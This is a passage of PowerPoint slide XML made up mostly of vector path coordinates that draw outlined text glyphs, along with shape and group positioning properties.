                <a:lnTo>
                  <a:pt x="553665" y="29140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="551122" y="20377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="547476" y="13051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="545918" y="11200"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="737235" h="104775">
                <a:moveTo>
                  <a:pt x="638338" y="11674"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="614982" y="11674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="619770" y="13141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="626659" y="19035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="628375" y="23122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="628375" y="34051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="626794" y="39358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="601770" y="68216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="578394" y="88426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="578394" y="102516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="646398" y="102516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="646398" y="90977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="592352" y="90977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="596824" y="87206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="611865" y="74245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616834" y="69684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="621645" y="64942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="625010" y="61668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="627878" y="58687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="630227" y="55977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="632598" y="53290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="642152" y="31477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="642093" y="19035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="639216" y="12419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="638338" y="11674"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="737235" h="104775">
                <a:moveTo>
                  <a:pt x="619454" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="604164" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="599015" y="654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="588354" y="3274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="584086" y="4696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="580901" y="6277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="580901" y="20435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="581579" y="20435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="586119" y="17477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590771" y="15264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="600227" y="12419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="604729" y="11674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="638338" y="11674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="627517" y="2483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="619454" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="737235" h="104775">
                <a:moveTo>
                  <a:pt x="728791" y="11674"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="705435" y="11674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="710223" y="13141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="717112" y="19035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718828" y="23122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718828" y="34051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="717247" y="39358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="692223" y="68216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="668847" y="88426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="668847" y="102516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="736851" y="102516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="736851" y="90977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="682805" y="90977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="687277" y="87206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="702318" y="74245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="707287" y="69684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="712098" y="64942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="715463" y="61668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718331" y="58687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="720680" y="55977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="723051" y="53290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="732605" y="31477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="732546" y="19035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="729669" y="12419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="728791" y="11674"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="737235" h="104775">
                <a:moveTo>
                  <a:pt x="709907" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="694617" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="689468" y="654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678807" y="3274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="674539" y="4696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="671354" y="6277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="671354" y="20435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="672032" y="20435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="676571" y="17477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="681224" y="15264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="690680" y="12419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="695182" y="11674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="728791" y="11674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="717970" y="2483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="709907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C84DE021-51FC-CA94-F7C1-74E019691D51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7497391" y="2902212"/>
            <a:ext cx="555625" cy="104775"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="555625" h="104775">
                <a:moveTo>
                  <a:pt x="33290" y="2100"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="2100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="102516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13370" y="102516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13370" y="65077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33922" y="65077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39862" y="64219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49325" y="60764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53413" y="58168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57869" y="53697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13370" y="53697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13370" y="13571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59961" y="13571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57523" y="10929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50454" y="6209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46750" y="4629"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38394" y="2596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33290" y="2100"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="555625" h="104775">
                <a:moveTo>
                  <a:pt x="59961" y="13571"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="30805" y="13571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34306" y="13864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39839" y="15083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42301" y="16077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46931" y="19103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48783" y="21180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49980" y="23754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51200" y="26306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51809" y="29332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51809" y="35745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51380" y="38432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30015" y="53697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57869" y="53697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59646" y="51913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61837" y="48616"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64931" y="41029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65699" y="36896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65636" y="26306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64660" y="21767"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60482" y="14135"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59961" y="13571"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="555625" h="104775">
                <a:moveTo>
                  <a:pt x="110824" y="25087"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="78375" y="48401"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76021" y="64874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76609" y="73600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103243" y="103948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110824" y="104616"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118349" y="103948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125072" y="101946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130995" y="98615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136119" y="93958"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136312" y="93687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104003" y="93687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98723" y="91271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89120" y="55119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91017" y="47871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98606" y="38387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103958" y="36016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136280" y="36016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136119" y="35790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130995" y="31107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125072" y="27763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118349" y="25756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110824" y="25087"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="555625" h="104775">
                <a:moveTo>
                  <a:pt x="136280" y="36016"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="117622" y="36016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122930" y="38387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130563" y="47871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132483" y="55119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132483" y="74426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130631" y="81355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130563" y="81606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122862" y="91271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117577" y="93687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136312" y="93687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="140253" y="88140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143093" y="81606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143202" y="81355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144971" y="73600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145560" y="64874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144971" y="56157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143202" y="48401"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="140253" y="41611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136280" y="36016"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="555625" h="104775">
                <a:moveTo>
                  <a:pt x="180363" y="27458"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="167693" y="27458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167693" y="102516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180363" y="102516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180363" y="49045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="183751" y="46290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187252" y="44055"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194547" y="40600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197835" y="39832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214715" y="39832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214715" y="38319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180363" y="38319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180363" y="27458"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="555625" h="104775">
                <a:moveTo>
                  <a:pt x="214715" y="39832"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="206765" y="39832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="210311" y="40238"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212330" y="40600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214038" y="41006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214715" y="41006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214715" y="39832"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="555625" h="104775">
                <a:moveTo>
                  <a:pt x="211237" y="27458"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200183" y="27458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197528" y="28022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="189849" y="31409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185400" y="34277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180363" y="38319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214715" y="38319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214715" y="28022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214860" y="28022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="211237" y="27458"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="555625" h="104775">
                <a:moveTo>
                  <a:pt x="241343" y="37845"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="228673" y="37845"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228673" y="87026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="230660" y="93664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238678" y="101929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="244527" y="104006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254419" y="104006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="256926" y="103803"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="262550" y="102990"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265147" y="102471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267180" y="101929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267519" y="101929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267519" y="92874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="251958" y="92874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250011" y="92558"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249552" y="92558"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245954" y="90842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241433" y="79213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241343" y="37845"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="555625" h="104775">
                <a:moveTo>
                  <a:pt x="267519" y="90435"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="266841" y="90435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265847" y="90842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="264244" y="91361"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="259750" y="92558"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="257581" y="92874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267519" y="92874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267519" y="90435"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="555625" h="104775">
                <a:moveTo>
                  <a:pt x="267519" y="27187"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="220090" y="27187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220090" y="37845"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267519" y="37845"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267519" y="27187"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="555625" h="104775">
                <a:moveTo>
                  <a:pt x="241343" y="5532"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="228673" y="5532"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228673" y="27187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241343" y="27187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241343" y="5532"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="555625" h="104775">
                <a:moveTo>
                  <a:pt x="311424" y="27187"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="295321" y="27187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295321" y="46403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311424" y="46403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311424" y="27187"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="555625" h="104775">
                <a:moveTo>
                  <a:pt x="311424" y="83300"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="295321" y="83300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295321" y="102516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311424" y="102516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311424" y="83300"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="555625" h="104775">
                <a:moveTo>
                  <a:pt x="457439" y="11674"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="434083" y="11674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="438871" y="13141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="445760" y="19035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="447476" y="23122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="447476" y="34051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="445895" y="39358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="420871" y="68216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="397495" y="88426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="397495" y="102516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="465499" y="102516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="465499" y="90977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="411453" y="90977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="415925" y="87206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="430966" y="74245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="435935" y="69684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="440746" y="64942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="444111" y="61668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446979" y="58687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="449328" y="55977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="451699" y="53290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="461230" y="31477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="461172" y="19035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="458317" y="12419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457439" y="11674"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="555625" h="104775">
                <a:moveTo>
                  <a:pt x="438555" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="423265" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="418116" y="654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="407455" y="3274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="403187" y="4696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400002" y="6277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400002" y="20435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400680" y="20435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="405220" y="17477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="409872" y="15264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419328" y="12419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423830" y="11674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457439" y="11674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446618" y="2483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="438555" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="555625" h="104775">
                <a:moveTo>
                  <a:pt x="490659" y="84519"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="489710" y="84519"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="489710" y="98745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="493349" y="100394"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="497502" y="101748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="507665" y="104029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="512950" y="104616"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="524333" y="104616"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="547474" y="92942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="513402" y="92942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508546" y="92129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="498654" y="88832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="494389" y="86868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="490659" y="84519"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="555625" h="104775">
                <a:moveTo>
                  <a:pt x="549656" y="51393"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="519070" y="51393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="522820" y="51755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="529505" y="53132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="532350" y="54351"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="534699" y="56045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536800" y="57490"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="538471" y="59409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540842" y="64174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541452" y="67087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541452" y="74110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540933" y="77226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="539968" y="79777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="538923" y="82622"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="521374" y="92942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="547474" y="92942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="548521" y="91903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550870" y="88313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="554226" y="79913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="554280" y="79777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="555139" y="75284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="555029" y="64174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="554145" y="59816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550193" y="52003"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="549656" y="51393"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="555625" h="104775">
                <a:moveTo>
                  <a:pt x="554461" y="2100"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="494024" y="2100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="494024" y="53832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="496666" y="53290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="499828" y="52748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506557" y="51755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="505896" y="51755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="510985" y="51393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="549656" y="51393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="547392" y="48819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540391" y="44009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536642" y="42361"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="528742" y="40600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="507033" y="40600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="507033" y="13909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="554461" y="13909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="554461" y="2100"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="555625" h="104775">
                <a:moveTo>
                  <a:pt x="525947" y="40284"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="510432" y="40284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="507033" y="40600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="529124" y="40600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="525947" y="40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294443ED-826B-992E-5643-F68D54C4DECE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="963614" y="1609761"/>
            <a:ext cx="7321345" cy="3001147"/>
            <a:chOff x="841859" y="1608883"/>
            <a:chExt cx="7321345" cy="3001147"/>
          </a:xfrm>
        </p:grpSpPr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9981113-8BDC-0A30-1833-0FEFAB14EB30}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
